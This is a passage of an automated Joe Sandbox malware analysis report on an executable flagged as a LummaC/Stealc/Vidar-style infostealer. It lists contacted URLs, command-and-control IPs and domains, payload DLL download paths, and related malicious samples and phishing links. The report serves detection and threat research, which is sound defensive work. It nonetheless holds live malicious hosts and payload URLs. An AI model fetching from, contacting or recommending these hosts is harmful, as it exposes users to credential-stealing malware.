https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa03	RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://5.75.211.162IJKFB	RegAsm.exe, 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/-	RegAsm.exe, 00000010.00000002.3154731112.000000000113D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	EGIDHD.4.dr	false	URL Reputation: safe	unknown
https://sketchfab.com	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	EGIDHD.4.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/msvcp140.dllAa	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://lv.queniujq.cn	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	KKKJKE.4.dr	false	URL Reputation: safe	unknown
https://www.youtube.com/	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/X	RegAsm.exe, 00000004.00000002.2770019694.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/softokn3.dllga	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://checkout.steampowered.com/	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	KKKJKE.4.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	RegAsm.exe, 00000004.00000002.2770019694.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, AKEGII.4.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/L	RegAsm.exe, 00000010.00000002.3154731112.000000000113D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/sqlp.dllW1	RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	RegAsm.exe, 00000004.00000002.2770019694.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, AKEGII.4.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.orgAEB	RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/;	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.entrust.net/rpa0	RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/vcruntime140.dllmc	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	offensivedzvju.shop	European Union	13335	CLOUDFLARENETUS	true
172.67.162.108	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
172.67.132.32	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
104.21.2.13	ballotnwu.site	United States	13335	CLOUDFLARENETUS	true
5.75.211.162	unknown	Germany	24940	HETZNER-ASDE	true
172.105.54.160	dbsmena.com	United States	63949	LINODE-APLinodeLLCUS	false
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true
172.67.208.139	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519663
Start date and time:	2024-09-26 20:13:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@29/35@14/10
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 93 Number of non-executed functions: 264
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:14:30	API Interceptor	6x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	HpCQgSai4e.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Ky4pZ0WB/download
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	http://www.tiktok758.com/	Get hash	malicious	Unknown	Browse	www.tiktok758.com/img/logo.4c830710.svg
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2wnz/
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/DiF66Hbf/download
	http://easyantrim.pages.dev/id.html	Get hash	malicious	HTMLPhisher	Browse	easyantrim.pages.dev/id.html
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/13rSMZZi/download
172.67.162.108	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.PWSX-gen.716.1862.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
172.67.132.32	ODFkNglL18.exe	Get hash	malicious	FormBook	Browse	www.vulcanrussia23.xyz/u6vb/?d2=8RKM9+ogc/zNp3a/v/pVBSMp5jGU9CsjRndkhXr9Vs/ymBgKZqRBOQixxTSimPHWcZ1z&4hLT6=9r_Xq4bPK8itcl2p

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	ACeTKO93e9.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
steamcommunity.com	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	HHXyi02DYl.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
fragnantbui.shop	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	ACeTKO93e9.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://egynte.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	172.67.130.49
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	104.21.7.112
	Xerox-029_Scanned.pdf	Get hash	malicious	Phisher	Browse	188.114.97.3
	https://sva-vliw.teleporthq.app/	Get hash	malicious	Unknown	Browse	104.17.245.203
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.208.139
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/p%C2%ADep%C2%ADe%C2%ADm%C2%ADu%C2%ADj%C2%ADi%C2%ADc%C2%ADa%C2%AD.%C2%ADc%C2%ADom/hj	Get hash	malicious	Unknown	Browse	104.21.7.172
	phish_alert_sp2_2.0.0.0(10).eml	Get hash	malicious	HTMLPhisher	Browse	104.22.15.225
	https://zlh1lc1cc8dntbjy.umso.co/	Get hash	malicious	Unknown	Browse	172.67.190.76
CLOUDFLARENETUS	http://egynte.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	172.67.130.49
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	104.21.7.112
	Xerox-029_Scanned.pdf	Get hash	malicious	Phisher	Browse	188.114.97.3
	https://sva-vliw.teleporthq.app/	Get hash	malicious	Unknown	Browse	104.17.245.203
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.208.139
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/p%C2%ADep%C2%ADe%C2%ADm%C2%ADu%C2%ADj%C2%ADi%C2%ADc%C2%ADa%C2%AD.%C2%ADc%C2%ADom/hj	Get hash	malicious	Unknown	Browse	104.21.7.172
	phish_alert_sp2_2.0.0.0(10).eml	Get hash	malicious	HTMLPhisher	Browse	104.22.15.225
	https://zlh1lc1cc8dntbjy.umso.co/	Get hash	malicious	Unknown	Browse	172.67.190.76
CLOUDFLARENETUS	http://egynte.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	172.67.130.49
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	104.21.7.112
	Xerox-029_Scanned.pdf	Get hash	malicious	Phisher	Browse	188.114.97.3
	https://sva-vliw.teleporthq.app/	Get hash	malicious	Unknown	Browse	104.17.245.203
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.208.139
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/p%C2%ADep%C2%ADe%C2%ADm%C2%ADu%C2%ADj%C2%ADi%C2%ADc%C2%ADa%C2%AD.%C2%ADc%C2%ADom/hj	Get hash	malicious	Unknown	Browse	104.21.7.172
	phish_alert_sp2_2.0.0.0(10).eml	Get hash	malicious	HTMLPhisher	Browse	104.22.15.225
	https://zlh1lc1cc8dntbjy.umso.co/	Get hash	malicious	Unknown	Browse	172.67.190.76

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
